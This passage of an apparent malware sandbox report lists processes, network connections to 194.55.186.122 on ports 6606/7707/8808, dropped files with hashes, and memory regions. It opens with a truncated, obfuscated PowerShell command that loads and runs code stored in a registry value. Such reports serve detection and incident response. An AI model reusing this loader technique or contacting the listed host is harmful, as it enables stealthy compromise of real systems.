try]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+'7'+''+'s'+'t'+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{6005f29e-e544-43b0-8cc1-ce61f6fe6629}

C:\Users\Admin\AppData\Roaming\server.exe

"C:\Users\Admin\AppData\Roaming\server.exe"

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe b79514e16fe3047c57398db5e378dfa7 rdTHSDBjr0qVj/XVtoWHUg.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
N/A 127.0.0.1:6606 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
N/A 127.0.0.1:7707 tcp
NL 194.55.186.122:7707 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
N/A 127.0.0.1:6606 tcp
NL 194.55.186.122:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
NL 194.55.186.122:8808 tcp
N/A 127.0.0.1:7707 tcp
NL 194.55.186.122:8808 tcp
NL 194.55.186.122:8808 tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
NL 194.55.186.122:7707 tcp
NL 194.55.186.122:7707 tcp

Files

memory/764-0-0x00007FF96DF73000-0x00007FF96DF75000-memory.dmp

memory/764-1-0x00000000007E0000-0x0000000000854000-memory.dmp

memory/764-2-0x0000000001130000-0x000000000117E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\server.exe

MD5 888ff5f8b060ce5be6249e2529a6a9ec
SHA1 f2a2facd8e9f5d000102a90cd487a99c3acf5c42
SHA256 5fc41380ed9f0400d4ffd34d0ef12099d88210904fe2f539acc7c16391da8f66
SHA512 8590feb0ecbae8d408addc37a177eabcfb338e193cf34b81310a1b67f56be0de4850c5269e26bdc8670a109aa21c3560cad0571c9a4867871a88f53978e5b598

memory/2472-64-0x0000000074B8E000-0x0000000074B8F000-memory.dmp

memory/2472-65-0x0000000000FC0000-0x000000000100C000-memory.dmp

memory/2472-66-0x0000000005940000-0x00000000059A6000-memory.dmp

memory/2472-67-0x0000000005E10000-0x0000000005EAC000-memory.dmp

memory/2472-68-0x0000000074B80000-0x0000000075330000-memory.dmp

memory/2472-73-0x0000000005DE0000-0x0000000005DF2000-memory.dmp

memory/2472-74-0x0000000006E30000-0x00000000073D4000-memory.dmp

memory/2472-79-0x0000000074B80000-0x0000000075330000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp9819.tmp.bat

MD5 f6726e87c8c22df2839770999a832d7e
SHA1 5943005dfc609b2651bf81bf0f7f31a110f64e74
SHA256 246614c2528aeaa22120bd15939d660da0ca6539fe7d3771132985e21c893cf8
SHA512 7bcf1a46e3c9294fe53c5277ef6600bed787b6914db45b6375dbd98f2d055caf65186f4237d1dd01c38fa79214ee8e8fafccfd653e3b15654334bcbf895eb505

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server.exe.log

MD5 294367dd291cf52c49e0aea7db745ab7
SHA1 77f54d0d35dad4fde4a37791f0ad4b087ee453ef
SHA256 245d0397c53126c9af23db4a3cf4e08ecbee60ecc2fdbba69b12cc7d606b7b8e
SHA512 c685bc0efe880d221cd91fce12cc51aefba31c174786ab3caf6c00d4e763ba1dc45fd4f757793e367edf44cf5d64477ce88beec74ba48c48a3e408ad7376cf3b

C:\Windows\Logs\ReAgent\ReAgent.log

MD5 266ea1ffc8670bc3e9c92ccefa373ad6
SHA1 623d5dc356ff804915881a8d42eff55dc1eff3a4
SHA256 351766394c116eca9b8884947c1676b5918198acb2274d9a37f3c77719bd9011
SHA512 f105baf9e89826b4d05aa8df6983818ff59bbb18466a77472b47603f0dcb9251216b45636a82a55634262d50fc5de1953b41c28d84662ff3dabe02e68c42c92b

C:\Windows\SysWOW64\Recovery\ReAgent.xml

MD5 7ba1a1ae453e18669377cbd6eb101109
SHA1 e57bd758fffefce630ab1399876f5c50e67c7804
SHA256 0f7d35d68a237b9c7d6d24c736e9a758761bb0840c113686b81e2ce33928ef65
SHA512 7060bf7aeeaeaf1fb85f427307463ca00f3050318f8630e08a92d7be9f0a4870d8c44c3323c9b81df6f1651ad8171009c0abde3b11f766da238c785f72ba05ff

C:\Windows\Panther\UnattendGC\diagwrn.xml

MD5 25f5c74b9830bb0ea88b6ab50a4405aa
SHA1 746653818c6f3a0e639bb48a5aa3354ea36b1da8
SHA256 40dd1b8f476482250183cebb743267291d451b382c14399982db893cabb61902
SHA512 8fe9f2767cdc886e3bb40d07cef8eb4ebd661cda454640878f7885990fa0d71de3ca242aa84a9e2e50ea386dc86dfdbced8764f66f775151d0501a60f8848c26

C:\Windows\Panther\UnattendGC\diagerr.xml

MD5 8344f40836cda9a798f11905f5e6c4ff
SHA1 fdc4d205d8cbe99a59b47a7d14cf28eddcd393b7
SHA256 d5a66c8848bfeecf05fb4ed643ea0888225190b87b79266fbd3a4a3dafb19cea
SHA512 1ff61300a2dd8208f78720ab35f9f2934cc40c3b2c3f0024debe53e7e956a73c62946601f66093f7af91be63d9581b77d52d496b88a07cac4ebbb98f6f43a32d

memory/868-93-0x0000000005E20000-0x0000000005E49000-memory.dmp

memory/2220-94-0x0000000000400000-0x000000000042B000-memory.dmp

memory/2220-97-0x0000000000400000-0x000000000042B000-memory.dmp

memory/3992-99-0x000002366D650000-0x000002366D672000-memory.dmp

C:\Windows\Temp\__PSScriptPolicyTest_ojryzihi.dz3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3992-108-0x0000023670040000-0x000002367006A000-memory.dmp

memory/3992-110-0x00007FF98B450000-0x00007FF98B50E000-memory.dmp

memory/3992-109-0x00007FF98C270000-0x00007FF98C465000-memory.dmp

memory/1924-114-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1924-118-0x00007FF98B450000-0x00007FF98B50E000-memory.dmp

memory/1924-116-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1924-113-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1924-112-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1924-111-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1924-119-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1924-117-0x00007FF98C270000-0x00007FF98C465000-memory.dmp

memory/672-143-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp

memory/952-155-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp

memory/64-166-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp

memory/64-165-0x000001A5719A0000-0x000001A5719CB000-memory.dmp

memory/64-159-0x000001A5719A0000-0x000001A5719CB000-memory.dmp

memory/512-173-0x000002837CAF0000-0x000002837CB1B000-memory.dmp

memory/868-171-0x0000000005EF0000-0x0000000005F82000-memory.dmp

memory/952-154-0x000002CA3CB00000-0x000002CA3CB2B000-memory.dmp

memory/952-148-0x000002CA3CB00000-0x000002CA3CB2B000-memory.dmp

memory/672-142-0x000001A852000000-0x000001A85202B000-memory.dmp

memory/672-136-0x000001A852000000-0x000001A85202B000-memory.dmp

memory/616-132-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp

memory/616-131-0x000001C6701F0000-0x000001C67021B000-memory.dmp

memory/616-125-0x000001C6701F0000-0x000001C67021B000-memory.dmp

memory/616-124-0x000001C6701F0000-0x000001C67021B000-memory.dmp

memory/616-123-0x000001C6701C0000-0x000001C6701E5000-memory.dmp

memory/868-493-0x00000000061E0000-0x0000000006202000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 4c3d2f52ebbc385b6a59fda070b8e90c
SHA1 ab073fcd4b3669b751b2d3bcdc780b0d23afc530
SHA256 31eed57f34247ba01371716d80544208b1c32194bd0cd807482d615bcb0efacd
SHA512 18bdbe36b1f82daaf8ea830964d99f7fa06f76d4e7ba58c8c4f289c98e395db3cfdf3a41d5086276e2263da98d64cbc8214fd07e957aaa06d8add884692349f8

C:\Windows\Logs\ReAgent\ReAgent.log

MD5 5ecbc850b5fa6473ff523a13973d358a
SHA1 5b0b85fb1ed11a3305c14d7d92eef650e8f22ca8
SHA256 b69048b84eaf46d31f9f255b61025031c0365d479c0b171fa3b43e149d065ce9
SHA512 56703d5aaf8924711f02b51944448e088849a59f98bc3861e0b54419fdbb61e21b633d522a5d1f6a422c632f58f8e6411433bc50850fa8be69d65a0e8e0366ee

C:\Windows\Panther\UnattendGC\diagerr.xml

MD5 b51715c98c2681b1db8672fdec572f8a
SHA1 f59faed191b4753a5cfc75a389db0421131dc6db
SHA256 0f9dbe75d90fb68cb5a79c7d7b8ddcf96dde63f87351160f3491627b28b54347
SHA512 80d8ee2ec011a5d4e18a5f866926147b40f6cf529ad2b99491f35697dd416aef05577c52630271b5745a352733c9b01ddc6dfb4424b0c0b4f523c7d1d0dd9a8c

C:\Windows\Panther\UnattendGC\setuperr.log

MD5 ced1ca365726eae2eb5ac2b0e64673f2
SHA1 ee405c8372585fa61e29287824c455b613ac4ccd
SHA256 972782c06405959ac6c88ccfb5fedd47344f29771f8cabb868549d3307e5c9fa
SHA512 b12fa66715181031db278e44726278e05fd4c56b5eb8d21295f8a1e4b3da6e3fbf1d5006be3967f195118e43c6f691dbf8eb551354b5b9acd5606b2439178e5f

C:\Windows\Panther\UnattendGC\diagwrn.xml

MD5 3306412a599a75950385f5c9d0a31073
SHA1 32d6ee13c5cddec57f5cad2df077d836fec2051d
SHA256 74807a52dcf3f68efebcd0d5c7b56bbd8a756af693bbf3fba146d10b0c7901d9
SHA512 1709d9d287303c816d515720b579d12419341c20098f49bb1788acd54d1d9301b927487afe123209b47b1d5058ffaf0cad050ea689b15c86822fae43eda8238f

C:\Windows\TEMP\tmpFC61.tmp.bat

MD5 c9a05695479ccfbcd7a10d1048c046fa
SHA1 a5d42616f6834c37499e11a265693f05922ed5e4
SHA256 eb84a275f490cf0b921de3f0246bfe9dc815306f78cd5f9badccfb6211177eb9
SHA512 60e6625d63eb658767a923545decf7a2940163242fa73415c3aaf16bd7f6ab6492ec45957f18ee7026c60f1331cea67d4421055b769848474ab422fe3fca91dd

C:\Windows\Logs\ReAgent\ReAgent.log

MD5 43f9997115d7b372562c298182c8833b
SHA1 b20767a81183fc60e9d52d3cf35b0abac8ba273d
SHA256 9ce0e6cd1f842eb0ebd0b12c4e6a6e2d1a6d43cd5a99c59e2ecf11873d8568b0
SHA512 72dd52a48b96c2ff4e21466316146a5f5ef3b73c1711e9f0a30abbeaae976a4b9ecc01a703eee0dd030a039438f07bb1218e04d06ac3634822502de47102c472

C:\Windows\Panther\UnattendGC\diagwrn.xml

MD5 5f987e19ed33f457d5ee0c0835d9061f
SHA1 72b59285725842b5c9ac10a00d9d704c523704c9
SHA256 f59832cc4e69f6a68f7f1c954efb8ccd27d925d87c505c3f0cfb125e1b68054c
SHA512 f27184ab689fd7e1fa03929ad3a3dadf42fab0940ff100ea979244ba970a5a5efb0614e855c22ed6cbec8c5669514816558a85d1c1eb9d771a4f266f7ea21e67

C:\Windows\Panther\UnattendGC\diagerr.xml

MD5 dfddf05354ab8c10c2e886ae2ada45d4
SHA1 af0834010af7a4bcb971c095d932c7a91eb832a7
SHA256 df5970399b7180ee2fd6b3a5d66a88769d9f406296cee757dd298cb9efdfca5d
SHA512 f980232b84b307fa8a35d43b8a3212cacbbe94545d9cdf45567d28205578fd387e08c3231faaecb62170879b05049559e35cd8d0e037ee133d07a85df7fc1b80

C:\Windows\Panther\UnattendGC\setuperr.log

MD5 fa3090ad564214fafcade78a25cc74be
SHA1 32992fbeaf109d47635587c421a8886b25d56619
SHA256 07030a6323223b7a89157b3958dae612ffe80c0859a1a7c33a2815f93dc8d326
SHA512 504e7c9f9dd1581b86a5167edf9ed7e9a3e943399bfcfab7f3b4d9e6447902fc099719a63720aec7276fc587da22cf330eea5943772bb1cf2946d27da78e20c5

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa187cac09f051e24146ad549a0f08a6
SHA1 2ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA256 7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512 960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2